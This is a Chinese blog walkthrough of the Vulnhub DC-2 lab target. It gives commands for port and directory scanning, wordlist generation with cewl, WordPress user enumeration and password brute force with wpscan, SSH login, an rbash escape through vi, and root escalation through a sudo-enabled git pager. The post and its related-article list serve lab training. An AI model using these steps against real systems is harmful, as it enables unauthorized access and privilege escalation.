内网靶机~~dc-2

最新推荐文章于 2024-05-30 09:02:27 发布
最新推荐文章于 2024-05-30 09:02:27 发布
阅读量484 收藏 8
点赞数 3
分类专栏: 内网靶机 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49714982/article/details/137142458
版权

一、信息收集

1.端口扫描:

nmap -sV -p 1-10000 10.1.1.4

2.CMS识别

3.目录扫描:

dirsearch http://10.1.1.4/

4.FLAG1

似乎让我们用cewl生成密码字典,并爆破登录。

cewl -w rewl_passwd.txt http://dc-2/index.php/flag/

总结,目标打开了80http端口和7744ssh端口;CMS发现目标使用了WordPress和Mysql;并且发现目标的web后台/wp-login.php,进一步确认了WordPress框架。

二、WEB渗透

1.获取账号以及密码

使用wpscan获取账号:

wpscan --url http://dc-2/ -e u 

使用wpscan以及信息收集cewl生成的字典爆破密码:

wpscan --url http://dc-2/ -e u -P rewl_passwd.txt

找到了tom以及jerry的账号密码,尝试登录后台。

2.FLAG2

尝试ssh连接拿到shell,发现只有tom可以ssh连接成功。

ssh tom@10.1.1.4 -p 7744

三、内网渗透

1.信息收集:

发现无法cat,查看可以执行的命令。

compgen -c

发现vi可以使用,使用vi查询得到FLAG3结果。

2.FLAG3

提示我们进行su提权

四、提权

echo $SHELL

发现是rbash限制,我们需要逃逸rbash,使用大佬的代码

# vim/vi进入之后
:set shell=/bin/sh # 或者用/bin/bash
:shell

# 切换完成之后还要添加环境变量。给$PATH变量增加两个路径,用来查找命令
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

之后cd到jerry拿到flag4

1.FLAG4

2.根据提示使用git提权

sudo -l  #查看sudo -l  如果git不需要passwd则可以进行提权

sudo git help config #在末行命令模式输入 
!/bin/bash 或 !'sh' #完成提权 
sudo git -p help 
!/bin/bash #输入!/bin/bash,即可打开一个用户为root的shell

最后访问 /root文件夹即可获取final_shell!!!!

login_upset
关注
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC-1内靶机渗透
weixin_42373409的博客
01-12 501
DC-1内靶机渗透 实验环境: 靶机:DC-1 渗透机:kali 2020; 实验内容: 首先下载并启动我们的靶机; 1.由于我们进行内渗透,并且不知道靶机的IP地址,所以我们先进行arp扫描,确定靶机IP地址,arp扫描命令为:arp-scan -l 2.确定了我们靶机的IP地址为192.168.131.136之后,首先要考虑的是它开放了那些端口提供了哪些服务,所以首选用nmap工具进行扫描开放端口 命令:nmap -A 192.168.131.136 3.用namp扫描之后,我们发现靶机开放了22、
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
靶机渗透-----DC-2
Z_Grant的博客
09-17 2768
文章目录一,工具介绍(1)cewl密码生成器(2)WPScan二,测试流程(1)主机发现(2)根据80端口的进一步测试(3)攻击准备(4)结合扫描出来的服务,尝试SSH登录 一,工具介绍 (1)cewl密码生成器 参考文章 用途 cewl是一个ruby应用,爬行指定url的指定深度。结果会返回一个单词列表,这个列进行密码爆破。 . 原理 爬取站上的信息,遍历目录。生成一些可能的密码组合。...
靶机DC-1攻略
weixin_43179779的博客
10-07 1108
dc-1靶机靶机攻略
DC-2靶机详细渗透过程
MRS_jianai的博客
11-30 1068
对DC-2靶机的渗透过程和收获总结
dc-1 靶机渗透学习
..
03-11 3087
环境: Vmware 虚拟机软件 dc -1 靶机ip地址:192.168.202.130 kali攻击机ip地址:192.168.202.129 本次渗透过程kali攻击机和dc靶机都采取NAT模式 信息收集 首先用ipconfig查看当前kali机所处段。 得到当前kali机的ip地址后,用nmap对当前段进行扫描,主机探活。 nmap超详细使用教程_Kris__zhang的博客-CSDN博客_nmap使用教程 nmap -sP 192.168.202.0/24 .
DC-1靶机渗透
m0_62008601的博客
04-28 3569
攻击机:kali IP:192.168.56.102 靶机:DC-1 IP:192.168.56.101 我的DC-1是在virtualbox打开的,导入VMware的话,扫描ip的时候扫不出来(不一定每个人都是这样)络设置的是仅主机络 kali是在VMware里的,络设置为桥接模式,这样也能确保在同一c段,就能扫得出结果。 在ka...
[Vulnhub] DC-9靶机渗透
weixin_45605352的博客
08-10 443
0x00 环境搭建 靶机地址:http://www.vulnhub.com/entry/dc-9,412/ 下载之后用vmware打开即可,使用桥接模式。 开机后搭建完成: 0x01 主机端口探测 用arp-scan -l探测内存活主机,再用nmap -sV -p- ip来探测端口: 发现开启了80端口(HTTP服务),22端口存在过滤机制(SSH服务) 0x02 web渗透 访问80端口,没判断出是什么CMS: 目录扫描,发现登录入口: xray扫描出一个sql注入: 尝试注入: 丢到
DC-1靶机实战和分析
weixin_48202759的博客
08-31 800
前言 我们都知道,对靶机的渗透,可以宽阔自己的解题思路,练习并熟悉相关操作命令,提高自己的能力。下面我就对Vulnhub的DC-1靶机进行渗透,靶机设置了5个flag,咱们依次找到它。并通过图文形式讲解涉及到的相关知识点。DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/ 目标机IP地址:198.162.9.138 攻击机kali IP地址:198.132.9.129 目标探测 渗透测试的第一步,是信息收集,这一步很重要,关系到后面的渗透步骤。下面我们对
DC-2靶机详解
苏生要努力
03-03 1195
写写自己打DC-2的过程使用工具DC-2的靶机下载地址为:https://www.vulnhub.com/entry/dc-2,311/
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
登录安全分析报告:小米官注册
Explinks的博客
05-29 965
图形验证及交互验证方式的安全性到底如何?请看具体分析。
导线防碰撞警示灯:高压线路安全保障
最新发布
dxzhkj888888的博客
05-30 300
同时,警示灯的反光材料也起到了至关重要的作用,无论是白天还是夜晚,都能将光线反射到最远的距离,让警示效果倍增。导线防碰撞警示灯也叫高压线太阳能警示灯、户外高压线路夜间红色闪光灯,以其独特的设计和卓越的性能,成为了电力安全领域的保障。在广袤的大地上,高压线路如同血脉般纵横交错,然而,在这看似平静的电力输送背后,却隐藏着不容忽视的安全隐患。而到了夜晚,警示灯便开始了它的使命。导线防碰撞警示灯的出现,使得那些驾驶超高车辆、操作超高施工机械的司机们,也在警示灯的提醒下,更加谨慎地行驶和操作,避免了可能发生的危险。
络学习(九)|深入解析Cookie与Session:高级应用及安全实践
weixin_44435110的博客
05-28 694
通过本以上,后端开发人员可以深入了解Cookie和Session的高级应用、常见问题及其解决方案,有助于设计和实现高效、安全的会话管理系统。
安全-隧道搭建&穿透上线&内穿透-nps自定义上线&内渗透-Linux上线-cs上线Linux主机
rumil的博客
05-28 1546
nps内穿透工具是一款轻量级、高性能、功能强大的内代理服务器。支持tcp、udp、socks5、http等几乎所有流量转发,可用于访问内站、支付本地接口调试、ssh访问、远程桌面,内dns解析、内socks5代理等等……,并带有功能强大的web管理端。一个轻量级、高性能、强大的内穿透代理服务器,带有强大的web管理端。 内渗透-CS上线Linux主机-Linux上线
渗透DC-1靶机设计思路
05-24
2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值